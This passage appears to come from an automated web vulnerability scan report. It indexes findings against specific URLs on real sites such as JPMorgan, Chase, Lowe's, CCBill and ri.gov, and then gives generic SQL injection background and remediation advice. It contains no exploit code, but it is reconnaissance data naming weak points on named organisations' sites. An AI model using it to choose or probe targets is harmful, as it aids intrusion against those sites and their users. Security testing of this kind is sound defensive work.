11.243. http://www.jpmorgan.com/images/more_services_arrow.gif

11.244. http://www.jpmorgan.com/images/navbar_leftcorner.gif

11.245. http://www.jpmorgan.com/images/navbar_map.gif

11.246. http://www.jpmorgan.com/images/navbar_rightcorner2.gif

11.247. http://www.jpmorgan.com/images/news_buttons.jpg

11.248. http://www.jpmorgan.com/images/news_gradient_cell.jpg

11.249. http://www.jpmorgan.com/images/print_grey.gif

11.250. http://www.jpmorgan.com/images/scnd_body_arrow.gif

11.251. http://www.jpmorgan.com/images/scnd_client_logon.jpg

11.252. http://www.jpmorgan.com/images/scnd_client_pixel.jpg

11.253. http://www.jpmorgan.com/images/scnd_menu_tab.jpg

11.254. http://www.jpmorgan.com/images/scnd_menu_tab_left.jpg

11.255. http://www.jpmorgan.com/images/scnd_more_services_arrow.gif

11.256. http://www.jpmorgan.com/images/scnd_onstate_arrow.jpg

11.257. http://www.jpmorgan.com/images/scnd_tab_bar_pixel.jpg

11.258. http://www.jpmorgan.com/images/scnd_vert_dottedline.gif

11.259. http://www.jpmorgan.com/images/scnd_wht_bkg.jpg

11.260. http://www.jpmorgan.com/images/thrd_client_tab_left2.jpg

11.261. http://www.jpmorgan.com/images/thrd_client_tab_right2.jpg

11.262. http://www.jpmorgan.com/images/thrd_subnav_arrow.gif

11.263. http://www.jpmorgan.com/images/thrd_subnav_dottedline.jpg

11.264. http://www.jpmorgan.com/images/thumb_am_62.jpg

11.265. http://www.jpmorgan.com/images/thumb_cb_62.jpg

11.266. http://www.jpmorgan.com/images/thumb_ib_62.jpg

11.267. http://www.jpmorgan.com/images/thumb_pb_62.jpg

11.268. http://www.jpmorgan.com/images/thumb_ts_62.jpg

11.269. http://www.jpmorgan.com/images/thumb_wss_62.jpg

11.270. http://www.jpmorgan.com/images/ts/images_2008/background_subpage.jpg

11.271. http://www.jpmorgan.com/images/ts/images_2008/footer_pixel.gif

11.272. http://www.jpmorgan.com/images/ts/images_2008/logo_jpm.gif

11.273. http://www.jpmorgan.com/images/ts/images_2008/navbar_map.gif

11.274. http://www.jpmorgan.com/images/ts/images_2008/scnd_body_arrow.gif

11.275. http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab.jpg

11.276. http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab_left.jpg

11.277. http://www.jpmorgan.com/images/ts/images_2008/scnd_onstate_arrow.jpg

11.278. http://www.jpmorgan.com/images/ts/images_2008/scnd_tab_bar_pixel.jpg

11.279. http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_left2.jpg

11.280. http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_right2.jpg

11.281. http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_arrow.gif

11.282. http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_dottedline.jpg

11.283. http://www.jpmorgan.com/images/ts/imgs/icon_arrow_up.gif

11.284. http://www.jpmorgan.com/images/ts/js/global.js

11.285. http://www.jpmorgan.com/pages/jpmorgan/am

11.286. http://www.jpmorgan.com/pages/jpmorgan/am/mediaboxarticles/WhyJPMAM

11.287. http://www.jpmorgan.com/pages/jpmorgan/am/uk

11.288. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office

11.289. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched

11.290. http://www.jpmorgan.com/pages/jpmorgan/am/usa

11.291. http://www.jpmorgan.com/pages/jpmorgan/clientlogon

11.292. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx

11.293. http://www.jpmorgan.com/pages/jpmorgan/private_banking

11.294. http://www.jpmorgan.com/script/jpmVideoPlayerHelper.js

11.295. http://www.jpmorgan.com/script/jquery-1.2.6.min.js

11.296. http://www.jpmorgan.com/script/jquery-1.3.2.min.js

11.297. http://www.jpmorgan.com/script/jquery.bgiframe.min.js

11.298. http://www.jpmorgan.com/script/jquery.pngFix.pack.js

11.299. http://www.jpmorgan.com/script/jquery_jpm_custom.js

11.300. http://www.jpmorgan.com/script/lightbox_support/builder.js

11.301. http://www.jpmorgan.com/script/lightbox_support/controls.js

11.302. http://www.jpmorgan.com/script/lightbox_support/dragdrop.js

11.303. http://www.jpmorgan.com/script/lightbox_support/effects.js

11.304. http://www.jpmorgan.com/script/lightbox_support/prototype.js

11.305. http://www.jpmorgan.com/script/lightbox_support/scriptaculous.js

11.306. http://www.jpmorgan.com/script/lightbox_support/slider.js

11.307. http://www.jpmorgan.com/script/lightbox_support/sound.js

11.308. http://www.jpmorgan.com/script/lightview.js

11.309. http://www.jpmorgan.com/script/swfobject.js

11.310. http://www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594

11.311. http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702

11.312. http://www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254

11.313. http://www.lowes.com/

11.314. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_appliances.png

11.315. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_grills.png

11.316. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_ope.png

11.317. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_patiofurniture.png

11.318. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110608_area5b_laptopimg.png

11.319. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110616_area6b_BeatTheHeat.png

11.320. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area2_PatioNLP.jpg

11.321. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_cooling.png

11.322. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_decking.png

11.323. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area4_vanity.png

11.324. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_control_PatioNLP.png

11.325. http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg

11.326. http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area4_Clearance.png

11.327. http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area5_GiftCards.png

11.328. http://www.lowes.com/campaign/summer/2011/images/homepage/20110706_control_Flooring.png

11.329. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Flooring.jpg

11.330. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Refrigeration.jpg

11.331. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Bali.png

11.332. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_OPE.png

11.333. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Shutters.png

11.334. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Tools.png

11.335. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area6b_Organization.png

11.336. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_control_Refrigeration.png

11.337. http://www.lowes.com/campaign/summer/2011/images/homepage/arrow_status.png

11.338. http://www.lowes.com/campaign/summer/2011/images/homepage/bullet.png

11.339. http://www.lowes.com/campaign/summer/2011/images/homepage/green_background.png

11.340. http://www.lowes.com/images/auxnav/auxnavbg.png

11.341. http://www.lowes.com/images/bg-category-li.gif

11.342. http://www.lowes.com/images/bg-page.gif

11.343. http://www.lowes.com/images/blank.gif

11.344. http://www.lowes.com/images/category-corner.png

11.345. http://www.lowes.com/images/category-right-cover.gif

11.346. http://www.lowes.com/images/cover.gif

11.347. http://www.lowes.com/images/sprites/buttons.png

11.348. http://www.lowes.com/images/sprites/global.png

11.349. http://www.lowes.com/pc_Flooring_4294934373_4294937087_

11.350. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/global-min.css

11.351. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/ie/ie-min.css

11.352. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/homepage-min.css

11.353. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/ie/ie-min.css

11.354. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-1.0.5.css

11.355. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-print.css

11.356. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6.css

11.357. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main-1.0.5.css

11.358. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

11.359. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/print.css

11.360. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/images/lowes_logo.gif

11.361. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/global/global-min.js

11.362. http://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

11.363. https://www.lowes.com/server-status

11.364. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

11.365. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

11.366. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

11.367. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

11.368. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

11.369. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

11.370. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

11.371. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

11.372. http://www.ox.popcap.com/delivery/afr.php

11.373. https://www.ri.gov/Licensing/renewal/license.php

11.374. http://www.uscg.mil/safetylevels/levels.js

11.375. http://www7.lowes.com/eluminate

11.376. http://www7.lowes.com/eluminate

12. Password field with autocomplete enabled

12.1. https://admin.ccbill.com/loginMM.cgi

12.2. https://affiliateadmin.ccbill.com/

12.3. http://apps.ccbill.com/

12.4. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html

12.5. http://apps.ccbill.com/p/developer.html

12.6. https://chaseonline.chase.com/Public/Reidentify/ReidentifyFilterView.aspx

12.7. https://store.popcap.com/payment.php

12.8. https://store.popcap.com/payment.php

12.9. https://store.popcap.com/payment.php

12.10. http://twitter.com/

12.11. http://twitter.com/

12.12. http://twitter.com/

12.13. http://ucc.state.ri.us/loginsystem/login_form.asp

12.14. http://www.citizencorps.gov/

12.15. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

13. Source code disclosure

13.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework

13.2. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/AJAXUserInterface/javascript/Common.js

13.3. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js

13.4. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

13.5. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js

13.6. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

14. Referer-dependent response

14.1. https://admin.ccbill.com/style/css/images/text-bg.gif

14.2. http://bstats.adbrite.com/click/bstats.gif

14.3. http://www.facebook.com/plugins/like.php

14.4. http://www.facebook.com/plugins/likebox.php

14.5. http://www.youtube.com/embed/IHmPw1HsCe4

15. Cross-domain POST

15.1. http://www.dhs.gov/index.shtm

15.2. http://www.riusar.com/

16. Cross-domain Referer leakage

16.1. http://fls.doubleclick.net/activityi

16.2. http://fls.doubleclick.net/activityi

16.3. http://fls.doubleclick.net/activityi

16.4. http://itunes.apple.com/us/app/katango/id447742732

16.5. http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.js

16.6. http://ucc.state.ri.us/loginsystem/login.asp

16.7. http://ucc.state.ri.us/ucc/uccmenu.asp

16.8. https://www.chase.com/ccp/index.jsp

16.9. https://www.chase.com/ccp/index.jsp

16.10. http://www.facebook.com/plugins/like.php

16.11. http://www.facebook.com/plugins/likebox.php

16.12. http://www.facebook.com/plugins/likebox.php

16.13. http://www.facebook.com/plugins/likebox.php

16.14. http://www.google.com/search

16.15. http://www.google.com/search

16.16. http://www.google.com/search

16.17. http://www.imiclk.com/cgi/r.cgi

16.18. http://www.imiclk.com/cgi/r.cgi

16.19. http://www.interactivemediaawards.com/winners/certificate.asp

16.20. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx

16.21. http://www.lowes.com/

16.22. http://www.lowes.com/pc_Flooring_4294934373_4294937087_

16.23. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

16.24. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

16.25. http://www.mass.gov/

16.26. http://www.mass.gov/

16.27. http://www.mass.gov/

16.28. http://www.ox.popcap.com/delivery/afr.php

16.29. https://www.ri.gov/information/

16.30. https://www.ri.gov/search/

16.31. https://www.ri.gov/visit/

17. Cross-domain script include

17.1. http://511.dot.ri.gov/hb/main.jsf

17.2. http://blog.katango.com/

17.3. http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/

17.4. http://itunes.apple.com/us/app/katango/id447742732

17.5. https://store.popcap.com/payment.php

17.6. http://trustedcs.com/

17.7. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html

17.8. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html

17.9. http://trustedcs.com/products/cross_domain.html

17.10. http://www.akqa.com/

17.11. http://www.akqa.com/approach

17.12. http://www.akqa.com/contact/san-francisco

17.13. http://www.akqa.com/library/js/akqa.devicemanager.js

17.14. http://www.akqa.com/work/volkswagen/real-racing-gti

17.15. http://www.akqa.com/work/warner-brothers/221b

17.16. http://www.ccbill.com/

17.17. http://www.ccbill.com/developers/faq.php

17.18. http://www.ccbill.com/developers/index.php

17.19. http://www.ccbill.com/developers/security/security-rewards-program.php

17.20. http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php

17.21. https://www.ccbill.com/developers/index.php

17.22. https://www.ccbill.com/developers/security/vulnerability-reward-registration.php

17.23. http://www.facebook.com/plugins/likebox.php

17.24. http://www.interactivemediaawards.com/winners/certificate.asp

17.25. http://www.jpmorgan.com/pages/jpmorgan/am/usa

17.26. http://www.jpmorganchase.com/corporate/Home/home.htm

17.27. http://www.ox.popcap.com/delivery/afr.php

17.28. http://www.ri.gov/press/view/14202

17.29. http://www.riema.ri.gov/

17.30. http://www.youtube.com/embed/IHmPw1HsCe4

17.31. http://www6.homedepot.com/how-to/index.html

18. TRACE method is enabled

18.1. http://bh.contextweb.com/

18.2. http://image2.pubmatic.com/

18.3. http://pixel.rubiconproject.com/

18.4. http://www.iavisarts.org/

19. Email addresses disclosed

19.1. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome

19.2. https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js

19.3. https://admin.ccbill.com/ext-2.2/custom/combos.css

19.4. https://admin.ccbill.com/ext-2.2/ext-all.js

19.5. https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css

19.6. https://admin.ccbill.com/loginIndex.cgi

19.7. https://admin.ccbill.com/loginMM.cgi

19.8. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html

19.9. http://apps.ccbill.com/p/developer.html

19.10. http://apps.ccbill.com/tmp/cache/intelli.config.js

19.11. http://apps.ccbill.com/tmp/cache/intelli.lang.en.js

19.12. http://blog.katango.com/osd.xml

19.13. http://bstats.adbrite.com/click/bstats.gif

19.14. http://ec.ox.popcap.com/popcap/js/jquery/plugins/jquery.cookie.js

19.15. https://iblogin.jpmorgan.com/sso/action/federateLogin

19.16. https://iblogin.jpmorgan.com/sso/action/federateLogin

19.17. https://iblogin.jpmorgan.com/sso/action/web_ForgotUsername

19.18. https://iblogin.jpmorgan.com/sso/action/web_GetForgotUsername

19.19. https://iblogin.jpmorgan.com/sso/action/web_NeedHelp

19.20. http://ocsp.thawte.com/

19.21. http://sos.ri.gov/business/acknowledgements/

19.22. http://sos.ri.gov/business/filings/annualreports/

19.23. http://sos.ri.gov/business/filings/businessforms/

19.24. http://sos.ri.gov/elections/voters/register/

19.25. https://store.popcap.com/js/jquery/plugins/jquery.cookie.js

19.26. https://support.ccbill.com/

19.27. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html

19.28. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html

19.29. http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp

19.30. http://ucc.state.ri.us/loginsystem/login_form.asp

19.31. http://www.211ri.org/js/prototype.js

19.32. http://www.akqa.com/contact/san-francisco

19.33. http://www.akqa.com/library/js/jquery.jqtransform-1.1.custom.min.js

19.34. http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php

19.35. https://www.chase.com/online/includes/javascript/jquery.url.js

19.36. http://www.citizencorps.gov/css/navDynamic.css

19.37. http://www.ct.gov/demhs/assets/templates/41/textsizer.js

19.38. http://www.ct.gov/demhs/site/default.asp

19.39. http://www.doit.ri.gov/directions/index.php

19.40. http://www.doit.ri.gov/news/projects/index.php

19.41. http://www.doit.ri.gov/search/index.php/

19.42. http://www.doit.ri.gov/search/index.php/captcha.php

19.43. http://www.fema.gov/css/text-styles.css

19.44. http://www.homedepot.com/lithium-handling.js

19.45. http://www.homedepot.com/static/scripts/jquery/jquery.pubsub.js

19.46. http://www.homedepot.com/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js

19.47. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched

19.48. http://www.jpmorgan.com/script/jquery.pngFix.pack.js

19.49. http://www.jpmorgan.com/script/lightbox_support/controls.js

19.50. http://www.jpmorganchase.com/corporate/includes/javascript/jScrollTouch.js

19.51. http://www.jpmorganchase.com/corporate/includes/javascript/jquery.cookie.js

19.52. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

19.53. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

19.54. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

19.55. http://www.popcap.com/js/jquery/plugins/jquery.cookie.js

19.56. http://www.ri.gov/js/fontsizer.js

19.57. http://www.ri.gov/js/jquery_cookie.js

19.58. http://www.ri.gov/opengovernment/

19.59. http://www.ri.gov/plugins/mozilla_search.xml

19.60. http://www.ri.gov/styles/ui-widgets.css

19.61. http://www.ri.gov/subscriber/

19.62. https://www.ri.gov/about/

19.63. https://www.ri.gov/about/staff.php

19.64. https://www.ri.gov/js/fontsizer.js

19.65. https://www.ri.gov/js/jquery_cookie.js

19.66. https://www.ri.gov/styles/ui-widgets.css

19.67. http://www.riema.ri.gov/contact/

19.68. http://www.riema.ri.gov/js/jquery.cdc.ticker.js

19.69. http://www.us-cert.gov/cas/tips/

20. Private IP addresses disclosed

20.1. http://blogs.adobe.com/psirt/

20.2. http://blogs.adobe.com/psirt/category/security-bulletins-and-advisories

20.3. http://blogs.adobe.com/psirt/category/uncategorized

20.4. https://iblogin.jpmorgan.com/sso/morcom/css/style.css

20.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.8. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.9. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/LHnm6CafkJe.js

20.11. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/2YGnqSRbxUI.css

20.12. https://store.popcap.com/payment.php

20.13. http://www.facebook.com/ajax/connect/connect_widget.php

20.14. http://www.facebook.com/plugins/like.php

20.15. http://www.facebook.com/plugins/like.php

20.16. http://www.facebook.com/plugins/likebox.php

20.17. http://www.facebook.com/plugins/likebox.php

20.18. http://www.facebook.com/plugins/likebox.php

20.19. http://www.facebook.com/plugins/likebox.php

20.20. http://www.facebook.com/plugins/likebox.php

20.21. http://www.google.com/sdch/vD843DpA.dct

20.22. https://www.lowes.com/server-status

20.23. https://www.lowes.com/server-status

20.24. http://www.us-cert.gov/cas/tips/

21. Credit card numbers disclosed

22. Robots.txt file

22.1. http://1.gravatar.com/blavatar/183104b8582a0b2533f9416c5f5d53fe

22.2. https://admin.ccbill.com/

22.3. http://apps.ccbill.com/favicon.ico

22.4. http://at.amgdgt.com/ads/

22.5. http://b.scorecardresearch.com/b

22.6. http://blog.katango.com/

22.7. http://blogs.adobe.com/psirt/

22.8. http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm

22.9. http://itunes.apple.com/WebObjects/MZStore.woa/wa/ajaxCache

22.10. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

22.11. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur

22.12. http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316

22.13. http://mtrcs.popcap.com/b/ss/popcapcom/1/H.21/s25055282826069

22.14. http://pixel.mathtag.com/data/img

22.15. http://s.gravatar.com/js/gprofiles.js

22.16. http://s0.wp.com/wp-content/themes/h4/global.css

22.17. http://s1.wp.com/wp-includes/js/l10n.js

22.18. http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.css

22.19. http://stats.adobe.com/b/ss/mxmacromedia/1/H.23.3/s22758062051143

22.20. http://tag.admeld.com/pixel

22.21. http://trustedcs.com/

22.22. http://www.apple.com/itunes

22.23. http://www.burstnet.com/enlightn/8171/99D2/

22.24. http://www.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536

22.25. http://www.imiclk.com/cgi/r.cgi

22.26. http://www.interactivemediaawards.com/winners/certificate.asp

22.27. http://www.lowes.com/

22.28. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

22.29. http://www.ox.popcap.com/delivery/afr.php

22.30. http://www.popcap.com/favicon.ico

22.31. http://www.youtube.com/embed/IHmPw1HsCe4

22.32. http://www7.lowes.com/eluminate

23. Cacheable HTTPS response

23.1. https://access.jpmorgan.com/content/tssweb/shared/document/PP403.html

23.2. https://admin.ccbill.com/favicon.ico

23.3. https://admin.ccbill.com/loginIndex.cgi

23.4. https://admin.ccbill.com/loginMM.cgi

23.5. https://affiliateadmin.ccbill.com/

23.6. https://affiliateadmin.ccbill.com/favicon.ico

23.7. https://pwr.jpmorgan.com/pwreset/forgotp1.validateuserdsp.epr

23.8. https://pwr.jpmorgan.com/pwreset/forgotp1.validateusersubmit.epr

23.9. https://store.popcap.com/js/s_code.php

23.10. https://support.ccbill.com/

23.11. https://www.ccbill.com/developers/index.php

23.12. https://www.ccbill.com/developers/security/vulnerability-reward-registration.php

23.13. https://www.ccbill.com/favicon.ico

23.14. https://www.chase.com/

23.15. https://www.chase.com/ccp/index.jsp

23.16. https://www.chase.com/ccpmweb/shared/document/webtrends.html

23.17. https://www.chase.com/index.jsp

23.18. https://www.chase.com/online/Checking/gift-card.htm

23.19. https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm

23.20. https://www.chase.com/psmhelp/index.jsp

23.21. https://www.lowes.com/server-status

23.22. https://www.ri.gov/Licensing/

23.23. https://www.ri.gov/about/

23.24. https://www.ri.gov/about/awards.php

23.25. https://www.ri.gov/about/staff.php

23.26. https://www.ri.gov/government/

23.27. https://www.ri.gov/help/

23.28. https://www.ri.gov/img/favicon.ico

23.29. https://www.ri.gov/information/

23.30. https://www.ri.gov/phonebook/

23.31. https://www.ri.gov/policies/

23.32. https://www.ri.gov/policies/access/

23.33. https://www.ri.gov/policies/disclaimer/

23.34. https://www.ri.gov/policies/legal/

23.35. https://www.ri.gov/policies/links/

23.36. https://www.ri.gov/policies/privacy/

23.37. https://www.ri.gov/search/

23.38. https://www.ri.gov/towns/

23.39. https://www.ri.gov/type/junction_02-webfont.woff

23.40. https://www.ri.gov/visit/

24. Multiple content types specified

24.1. http://trustedcs.com/

24.2. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html

24.3. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html

24.4. http://trustedcs.com/products/cross_domain.html

25. HTML does not specify charset

25.1. http://blastercorp.com/

25.2. http://fls.doubleclick.net/activityi

25.3. https://store.popcap.com/js/s_code.php

25.4. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp

25.5. http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp

25.6. http://ucc.state.ri.us/loginsystem/login_form.asp

25.7. http://ucc.state.ri.us/ucc/uccmenu.asp

25.8. http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp

25.9. https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm

25.10. http://www.citizencorps.gov/includes/facts.json

25.11. http://www.ct.gov/favicon.ico

25.12. http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Fragments/BB_Hero.htm

25.13. http://www.interactivemediaawards.com/favicon.ico

25.14. http://www.jpmorgan.com/

25.15. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/back_content.png

25.16. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/bk_menu_bt_over.jpg

25.17. https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html

25.18. https://www.lowes.com/MContent/Structured/MastheadArea/projects/bath.html

25.19. https://www.lowes.com/MContent/Structured/MastheadArea/projects/kitchen.html

25.20. https://www.lowes.com/MContent/Structured/MastheadArea/projects/laundry.html

25.21. http://www.popcap.com/js/s_code.php

25.22. http://www.readability.com/embed.js

25.23. http://www.readability.com/static/embed/embed.html

25.24. http://www2.tmc.state.ri.us/

26. HTML uses unrecognised charset

27. Content type incorrectly stated

27.1. http://apps.ccbill.com/favicon.ico

27.2. http://apps.ccbill.com/includes/common/category-icons/default.gif

27.3. http://ext.homedepot.com/www/esi/external/include.php

27.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

27.5. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur

27.6. http://sr2.liveperson.net/hcp/html/mTag.js

27.7. https://store.popcap.com/js/s_code.php

27.8. http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp

27.9. http://www.ccbill.com/favicon.ico

27.10. http://www.ccbill.com/signup/trans.cgi

27.11. https://www.ccbill.com/favicon.ico

27.12. http://www.citizencorps.gov/includes/facts.json

27.13. http://www.doit.ri.gov/favicon.ico

27.14. http://www.google.com/search

27.15. http://www.homedepot.com/businessControlledFragments/htmls/TypeAhead-min.json

27.16. http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Images/white_space_10px.gif

27.17. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/Homepage_js.json

27.18. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/hero_slider.json

27.19. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/lithium-handling.json

27.20. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/arrow_cta.png

27.21. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/clear.png

27.22. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange-square.png

27.23. http://www.homedepot.com/wcsstore/hdus/en_US/styles/businessjs.json

27.24. http://www.jpmorgan.com/cm/BlobServer

27.25. http://www.jpmorgan.com/cm/Satellite

27.26. http://www.jpmorgan.com/favicon.ico

27.27. http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg

27.28. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/js/ContenidoMenu.js

27.29. https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html

27.30. http://www.mass.gov/favicon.ico

27.31. http://www.popcap.com/js/s_code.php

27.32. http://www.readability.com/embed.js

27.33. http://www.res-x.com/ws/r2/Resonance.aspx

27.34. http://www.ri.gov/favicon.ico

27.35. http://www.ri.gov/img/favicon.ico

27.36. http://www.ri.gov/img/governmentbox/seal.gif

27.37. http://www.ri.gov/type/junction_02-webfont.woff

27.38. https://www.ri.gov/img/favicon.ico

27.39. https://www.ri.gov/type/junction_02-webfont.woff

27.40. http://www.riema.ri.gov/favicon.ico

27.41. http://www.us-cert.gov/favicon.ico

27.42. http://www6.homedepot.com/favicon.ico

27.43. http://www6.homedepot.com/how-to/assets/images/modal/lightbox-close.png



1. SQL injection
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



